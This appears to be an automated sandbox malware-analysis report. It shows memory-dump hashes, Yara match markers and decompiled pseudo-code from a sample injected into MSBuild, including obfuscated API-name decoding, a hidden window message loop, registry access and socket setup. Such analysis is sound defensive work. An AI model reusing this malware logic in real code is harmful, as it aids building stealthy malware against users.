                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                        • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                        • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                        • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E00409E61(void* __edx) {
                        				intOrPtr _v20;
                        				intOrPtr _v40;
                        				intOrPtr _v52;
                        				char _v60;
                        				void _v108;
                        				intOrPtr _v116;
                        				intOrPtr _v120;
                        				intOrPtr _v124;
                        				intOrPtr _v128;
                        				intOrPtr _v132;
                        				intOrPtr _v136;
                        				char _v140;
                        				intOrPtr _v144;
                        				intOrPtr _v148;
                        				intOrPtr _v152;
                        				char _v156;
                        				intOrPtr _v196;
                        				intOrPtr _v200;
                        				intOrPtr _v204;
                        				void* _t29;
                        				intOrPtr _t31;
                        				void* _t32;
                        				void* _t35;
                        				char* _t36;
                        				void* _t39;
                        				char _t45;
                        				void* _t46;
                        				intOrPtr* _t48;
                        
                        				_t39 = __edx;
                        				memcpy( &_v108, L"ssdaClass", 5 << 2);
                        				_t48 = _t46 - 0x90 + 0xc;
                        				_t29 = E004081AA("rdn465d0rCgXRsQ5ad24Yd6");
                        				_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t29);
                        				 *0x42b9e4 = _t31;
                        				if(_t31 != 0) {
                        					_t32 = E004081AA("Ed5rCgXRsQ5aC5C");
                        					_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t32);
                        					 *0x42b9e0 = _t31;
                        					if(_t31 == 0) {
                        						goto L1;
                        					} else {
                        						_t45 =  &_v60;
                        						_t35 =  &_v108;
                        						_t31 = E004129E4(_t45, 0, 0x30);
                        						_v156 = _t45;
                        						_v60 = 0x30;
                        						_v52 = E00409CF9;
                        						_v40 = 0;
                        						_v20 = _t35;
                        						L0041F854(); // executed
                        						_push(0);
                        						if(_t31 != 0) {
                        							_v156 = _t35;
                        							_v116 = 0;
                        							_v120 = 0;
                        							_v124 = 0;
                        							_v128 = 0xfffffffd;
                        							_v132 = 0;
                        							_v136 = 0;
                        							_v140 = 0;
                        							_v144 = 0;
                        							_v148 = 0;
                        							_v152 = 0;
                        							 *_t48 = 0; // executed
                        							L0041F8DC(); // executed
                        							_t48 = _t48 - 0x30;
                        							_t36 =  &_v140;
                        							if(_t31 == 0) {
                        								goto L4;
                        							} else {
                        								while(1) {
                        									_v196 = 0;
                        									_v200 = 0;
                        									_v204 = 0;
                        									 *_t48 = _t36;
                        									L0041F884();
                        									_t48 = _t48 - 0x10;
                        									if(_t31 <= 0) {
                        										break;
                        									}
                        									 *_t48 = _t36;
                        									L0041F814();
                        									_push(_t31);
                        									 *_t48 = _t36;
                        									L0041F8CC();
                        									_push(_t39);
                        								}
                        								 *0x422830 = 0xa;
                        							}
                        						} else {
                        							L4:
                        							 *0x422830 = 7;
                        						}
                        					}
                        				} else {
                        					L1:
                        					 *0x422830 = 6;
                        				}
                        				return _t31;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0$0$Ed5rCgXRsQ5aC5C$rdn465d0rCgXRsQ5ad24Yd6$ssdaClass$user32.dll
                        • API String ID: 0-2341246112
                        • Opcode ID: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
                        • Instruction ID: dc59c3b724a470855dcc4065ae2b59d1d9b3c777af613543eb6a0d926dcb9681
                        • Opcode Fuzzy Hash: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
                        • Instruction Fuzzy Hash: 863108B05183019AE310BF25D55531FBAE0BF84348F41892EF4C4AB292D7BD8949CB9B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E00410608(signed int __ecx, char _a4, intOrPtr _a8) {
                        				char _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v44;
                        				char* _v48;
                        				intOrPtr _v52;
                        				intOrPtr _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				char _v76;
                        				intOrPtr _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				intOrPtr _v108;
                        				char _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				void* _t41;
                        				intOrPtr* _t43;
                        
                        				_t35 = 0;
                        				_v44 = 0;
                        				_v52 = 0;
                        				_v56 = 0xf003f;
                        				_v60 = 0;
                        				_v48 =  &_v16;
                        				_v64 = 0;
                        				_v68 = 0;
                        				_v72 = _a8;
                        				_t27 = _a4;
                        				_v76 = _t27; // executed
                        				L0041F454(); // executed
                        				_t43 = _t41 - 0x20;
                        				if(_t27 == 0) {
                        					asm("repne scasb");
                        					_v104 = 0;
                        					_v96 = _v16;
                        					_v92 =  !(__ecx | 0xffffffff) - 1;
                        					_v100 = _v20;
                        					_v108 = _v24;
                        					_t33 = _v52;
                        					 *_t43 = _t33; // executed
                        					L0041F41C(); // executed
                        					_t43 = _t43 - 0x18;
                        					_t34 = _v76;
                        					_t35 = 0 | _t33 == 0x00000000;
                        					 *_t43 = _t34; // executed
                        					L0041F45C(); // executed
                        					_push(_t34);
                        				}
                        				return _t35;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ?
                        • API String ID: 0-1684325040
                        • Opcode ID: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
                        • Instruction ID: d7b5c200bfe116dfd6f132702afe2373019979046eeb2612c7d3539b4a1fd506
                        • Opcode Fuzzy Hash: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
                        • Instruction Fuzzy Hash: 6111B0B45083419FD340EF69D59475BFBE0BB88354F40892EF89883351E7B9D5898F86
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 20%
                        			E004059D3(signed int __ecx, signed int _a4, signed int _a8) {
                        				char _v44;
                        				char _v48;
                        				signed int _v60;
                        				intOrPtr _v68;
                        				signed int _v72;
                        				intOrPtr _v80;
                        				intOrPtr _v84;
                        				signed int _v88;
                        				signed int _v92;
                        				intOrPtr _v96;
                        				void* __ebp;
                        				signed int _t57;
                        				intOrPtr _t61;
                        				signed int _t63;
                        				intOrPtr _t71;
                        				signed int _t73;
                        				intOrPtr _t77;
                        				intOrPtr _t83;
                        				signed int _t87;
                        				signed int _t89;
                        				intOrPtr _t90;
                        				char* _t93;
                        				char* _t94;
                        				char* _t95;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t99;
                        				signed int* _t100;
                        				void* _t101;
                        				intOrPtr* _t102;
                        
                        				_t88 = __ecx;
                        				_t100 =  &_v60;
                        				_t87 = _a4;
                        				_t97 = _a8;
                        				_v48 = 0xffffffff;
                        				if(E00408E53() != 4) {
                        					if(E00408E53() != 2) {
                        						_t93 =  &_v44;
                        						_v72 = _t97;
                        						 *_t100 = _t87;
                        						_v68 = _t93;
                        						_t57 = E004051B5(__ecx, _t90);
                        						if(_t57 != 0) {
                        							_v68 = 6;
                        							_v72 = 1;
                        							 *_t100 = 2; // executed
                        							L0041F8E4(); // executed
                        							_t101 = _t100 - 0xc;
                        							_v60 = _t57;
                        							if(_t57 == 0xffffffff) {
                        								goto L28;
                        							}
                        							_v80 = 0x10;
                        							_v84 = _t93;
                        							_v88 = _t57; // executed
                        							L0041F93C(); // executed
                        							_t102 = _t101 - 0xc;
                        							if(_t57 != 0) {
                        								L12:
                        								 *_t102 =  &_v72;
                        								_t57 = E00405999(_t90);
                        								goto L28;
                        							}
                        							L31:
                        							return _v72;
                        						}
                        						L28:
                        						return _t57 | 0xffffffff;
                        					}
                        					if( *0x42b300 == 0) {
                        						 *0x42b300 =  *0x42b304;
                        					}
                        					_t94 =  &_v44;
                        					_t98 =  &_v48;
                        					while(1) {
                        						_t61 =  *0x42b300;
                        						if(_t61 == 0) {
                        							goto L31;
                        						}
                        						_v68 = _t94;
                        						_t91 =  *((intOrPtr*)(_t61 + 0x44));
                        						 *_t100 = _t61 + 4;
                        						_v72 =  *((intOrPtr*)(_t61 + 0x44));
                        						_t63 = E004051B5(_t88,  *((intOrPtr*)(_t61 + 0x44)));
                        						if(_t63 == 0) {
                        							L26:
                        							 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
                        							continue;
                        						}
                        						_v68 = 0;
                        						_v72 = 1;
                        						 *_t100 = 2;
                        						L0041F8E4();
                        						_v80 = 0x10;
                        						_v84 = _t94;
                        						_v88 = _t63;
                        						_v60 = _t63;
                        						L0041F93C();
                        						_t100 = _t100;
                        						if(_t63 == 0) {
                        							_v88 = _t97;
                        							_v92 = _t87;
                        							_v96 =  *0x42b300;
                        							 *_t100 = _v72;
                        							if(E004058E9(_t98) == 0) {
                        								goto L23;
                        							}
                        							goto L31;
                        						}
                        						L23:
                        						 *_t100 = _t98;
                        						E00405999(_t91);
                        						goto L26;
                        					}
                        					goto L31;
                        				}
                        				if( *0x42b300 == 0) {
                        					 *0x42b300 =  *0x42b304;
                        				}
                        				_t95 =  &_v44;
                        				_t99 =  &_v48;
                        				while(1) {
                        					_t71 =  *0x42b300;
                        					if(_t71 == 0) {
                        						goto L31;
                        					}
                        					_v68 = _t95;
                        					_t92 =  *((intOrPtr*)(_t71 + 0x44));
                        					 *_t100 = _t71 + 4;
                        					_v72 =  *((intOrPtr*)(_t71 + 0x44));
                        					_t73 = E004051B5(_t88,  *((intOrPtr*)(_t71 + 0x44)));
                        					if(_t73 == 0) {
                        						L15:
                        						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
                        						continue;
                        					}
                        					_v68 = 0;
                        					_v72 = 1;
                        					 *_t100 = 2;
                        					L0041F8E4();
                        					_v80 = 0x10;
                        					_v84 = _t95;
                        					_v88 = _t73;
                        					_v60 = _t73;
                        					L0041F93C();
                        					_t100 = _t100;
                        					if(_t73 != 0) {
                        						L14:
                        						 *_t100 = _t99;
                        						E00405999(_t92);
                        						goto L15;
                        					}
                        					_t92 =  *0x42b300;
                        					_t77 =  *((intOrPtr*)(_t92 + 0x88));
                        					_t88 =  *((intOrPtr*)(_t77 + 0x44));
                        					_v96 = _t92;
                        					_v92 = _t77 + 4;
                        					_v88 =  *((intOrPtr*)(_t77 + 0x44));
                        					 *_t100 = _v72;
                        					if(E004058E9(_t99) == 0) {
                        						goto L14;
                        					} else {
                        						goto L8;
                        					}
                        					while(1) {
                        						L8:
                        						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
                        						_t90 =  *0x42b300;
                        						if(_t90 == 0) {
                        							goto L31;
                        						}
                        						_t83 =  *((intOrPtr*)(_t90 + 0x88));
                        						_t89 = _v72;
                        						if(_t83 == 0) {
                        							_v88 = _t97;
                        							_v92 = _t87;
                        						} else {
                        							_v92 = _t83 + 4;
                        							_v88 =  *(_t83 + 0x44);
                        						}
                        						_v96 = _t90;
                        						 *_t100 = _t89;
                        						if(E004058E9(_t99) != 0) {
                        							continue;
                        						} else {
                        							goto L12;
                        						}
                        					}
                        					goto L31;
                        				}
                        				goto L31;
                        			}

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
                        • Instruction ID: dc7f80c90ba20af356347f24dd4de35e54817c060e921352895bdcebc13e1e4f
                        • Opcode Fuzzy Hash: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
                        • Instruction Fuzzy Hash: 7D71B7B0508B059FD710EF29D58465BBBE0FF84354F54893EE88897392D778A4468F4A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E004106BD(void* __eax, char _a4, intOrPtr _a8, intOrPtr _a12) {
                        				intOrPtr _v24;
                        				char _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				char _v56;
                        				char _v60;
                        				intOrPtr _v64;
                        				signed int _v68;
                        				intOrPtr _v72;
                        				char _v76;
                        				signed int _v80;
                        				intOrPtr _v84;
                        				signed int _v88;
                        				intOrPtr _v92;
                        				char _v96;
                        				signed int _v100;
                        				signed int _v104;
                        				signed int _v108;
                        				intOrPtr _v112;
                        				intOrPtr _v120;
                        				intOrPtr _v124;
                        				char* _v128;
                        				intOrPtr _v132;
                        				intOrPtr _v136;
                        				signed int _t44;
                        				signed int _t45;
                        				signed int _t49;
                        				char _t51;
                        				intOrPtr _t53;
                        				char _t54;
                        				signed int _t55;
                        				signed int _t56;
                        				intOrPtr _t57;
                        				char* _t58;
                        				void* _t59;
                        				void* _t61;
                        				signed int* _t62;
                        
                        				_t54 = _a4;
                        				_t57 = _a8;
                        				_t56 =  &_v40;
                        				_v64 = 0x201;
                        				_v68 = 0;
                        				_v60 = _t56;
                        				_t53 = _a12;
                        				_v72 = _t57;
                        				_v76 = _t54; // executed
                        				L0041F42C(); // executed
                        				_t61 = _t59 - 0x28;
                        				if(__eax != 0) {
                        					_v96 = _t54;
                        					_v80 = _t56;
                        					_t55 = 0;
                        					_v84 = 0x101;
                        					_v88 = 0;
                        					_v92 = _t57;
                        					L0041F42C(); // executed
                        					_t62 = _t61 - 0x14;
                        					if(__eax == 0) {
                        						_t44 = _v80;
                        						_t58 =  &_v76;
                        						_v100 = 0;
                        						_v104 = 0;
                        						_v108 = 0;
                        						_v96 = _t58;
                        						_v112 = _t53;
                        						 *_t62 = _t44;
                        						L0041F424();
                        						_t62 = _t62 - 0x18;
                        						if(_t44 == 0 && _v100 < _v44) {
                        							goto L7;
                        						}
                        						goto L8;
                        					}
                        				} else {
                        					_t51 = _v60;
                        					_t58 =  &_v56;
                        					_v80 = 0;
                        					_v84 = 0;
                        					_v88 = 0;
                        					_t55 = 0;
                        					_v76 = _t58;
                        					_v92 = _t53;
                        					_v96 = _t51;
                        					L0041F424();
                        					_t62 = _t61 - 0x18;
                        					if(_t51 == 0 && _v24 > _v80) {
                        						L7:
                        						_v120 = _t58;
                        						_v132 = 0;
                        						_v136 = _t53;
                        						_v124 = _v48;
                        						_v128 =  &_v96;
                        						_t49 = _v104;
                        						 *_t62 = _t49;
                        						L0041F424();
                        						_t62 = _t62 - 0x18;
                        						_t55 = _t49 & 0xffffff00 | _t49 == 0x00000000;
                        					}
                        					L8:
                        					_t45 = _v104;
                        					 *_t62 = _t45;
                        					L0041F45C();
                        					_push(_t45);
                        				}
                        				return _t55;
                        			}

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
                        • Instruction ID: b9298c354bfd1ad9ab6003ea3d07812b51851590691558723ca7996c5ddaa5d6
                        • Opcode Fuzzy Hash: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
                        • Instruction Fuzzy Hash: 8331C3B55083059BD300AF6AC54435BFBE4BB84758F40892EF89897351D7B8EA898F86
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fa5260b1d5733d40928bb1bda00e8025699e4cb47a79eb0a4c3e691f0a83ba9
                        • Instruction ID: 8f5191d016256b480c4c319c523a8aa6d2556ceaf8fc0f27f6562cff8ba32449
                        • Opcode Fuzzy Hash: 8fa5260b1d5733d40928bb1bda00e8025699e4cb47a79eb0a4c3e691f0a83ba9
                        • Instruction Fuzzy Hash: 7E31B6B0508300DED710EF25C58976BBBE0BF84748F50892EE48997292D779CD85CB8A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
                        • Instruction ID: c7c63fa6584d291762938b61b036814656b365f8fb5761cd288c2352f27d1738
                        • Opcode Fuzzy Hash: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
                        • Instruction Fuzzy Hash: 6AF01DB45157109FC710EF29C48165BBBE0FF48314F06895DE8C89B316E238D880CB56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E00407F08(intOrPtr _a4, intOrPtr _a8) {
                        				char _v16;
                        				char* _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				intOrPtr _v56;
                        				intOrPtr _t11;
                        				void* _t13;
                        				intOrPtr* _t14;
                        
                        				_v44 = 0;
                        				_v56 = 0;
                        				 *_t14 = 0;
                        				_v40 =  &_v16;
                        				_v48 = _a8;
                        				_t11 = _a4;
                        				_v52 = _t11;
                        				L0041F7DC(); // executed
                        				_t13 = 0;
                        				if(_t11 != 0) {
                        					 *_t14 = _t11; // executed
                        					L0041F694(); // executed
                        					_push(_t11);
                        					_t13 = 1;
                        				}
                        				return _t13;
                        			}

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb4d98f2a53ae6409f6c220ec1503fd208175c29cdc863a72313857efbd16cf0
                        • Instruction ID: b77cc9640a869472d98c168585856c66a20ad6fb8ba8512900d684390161e27e
                        • Opcode Fuzzy Hash: fb4d98f2a53ae6409f6c220ec1503fd208175c29cdc863a72313857efbd16cf0
                        • Instruction Fuzzy Hash: 72E0C2B0A083418FD300EF29C44034BBBE1AB84308F40882EF898C7740E37ED9498B87
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E00405959(void* __edx) {
                        				char _v412;
                        				intOrPtr _v424;
                        				char* _t3;
                        				intOrPtr* _t5;
                        
                        				_t3 =  &_v412;
                        				 *_t5 = 0x202;
                        				_v424 = _t3;
                        				L0041F954(); // executed
                        				if(_t3 != 0) {
                        					 *_t5 = 0;
                        					L0041F64C();
                        				}
                        				 *_t5 = 0x42b314;
                        				L0041F56C();
                        				_push(_t3);
                        				return _t3;
                        			}

                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
